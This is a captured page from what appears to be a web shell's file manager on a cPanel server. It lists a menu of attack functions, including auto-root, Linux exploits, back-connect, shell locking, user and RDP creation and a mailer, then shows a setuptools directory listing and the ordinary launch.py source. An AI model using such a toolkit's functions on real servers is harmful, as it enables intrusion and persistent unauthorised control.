Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.130.95
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
setuptools /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
_distutils
[ DIR ]
drwxr-xr-x
_vendor
[ DIR ]
drwxr-xr-x
command
[ DIR ]
drwxr-xr-x
extern
[ DIR ]
drwxr-xr-x
__init__.py
7.27
KB
-rw-r--r--
_deprecation_warning.py
218
B
-rw-r--r--
_imp.py
2.34
KB
-rw-r--r--
archive_util.py
6.91
KB
-rw-r--r--
build_meta.py
10.29
KB
-rw-r--r--
config.py
22.61
KB
-rw-r--r--
dep_util.py
949
B
-rw-r--r--
depends.py
5.37
KB
-rw-r--r--
dist.py
42.15
KB
-rw-r--r--
errors.py
1.52
KB
-rw-r--r--
extension.py
1.64
KB
-rw-r--r--
glob.py
4.76
KB
-rw-r--r--
installer.py
3.73
KB
-rw-r--r--
launch.py
812
B
-rw-r--r--
monkey.py
5.09
KB
-rw-r--r--
msvc.py
49.38
KB
-rw-r--r--
namespaces.py
3.02
KB
-rw-r--r--
package_index.py
40.89
KB
-rw-r--r--
py34compat.py
245
B
-rw-r--r--
sandbox.py
14.01
KB
-rw-r--r--
script (dev).tmpl
218
B
-rw-r--r--
script.tmpl
138
B
-rw-r--r--
unicode_utils.py
941
B
-rw-r--r--
version.py
144
B
-rw-r--r--
wheel.py
8.09
KB
-rw-r--r--
windows_support.py
714
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : launch.py
""" Launch the Python script on the command line after setuptools is bootstrapped via import. """ # Note that setuptools gets imported implicitly by the # invocation of this script using python -m setuptools.launch import tokenize import sys def run(): """ Run the script in sys.argv[1] as if it had been invoked naturally. """ __builtins__ script_name = sys.argv[1] namespace = dict( __file__=script_name, __name__='__main__', __doc__=None, ) sys.argv[:] = sys.argv[1:] open_ = getattr(tokenize, 'open', open) with open_(script_name) as fid: script = fid.read() norm_script = script.replace('\\r\\n', '\\n') code = compile(norm_script, script_name, 'exec') exec(code, namespace) if __name__ == '__main__': run()
Close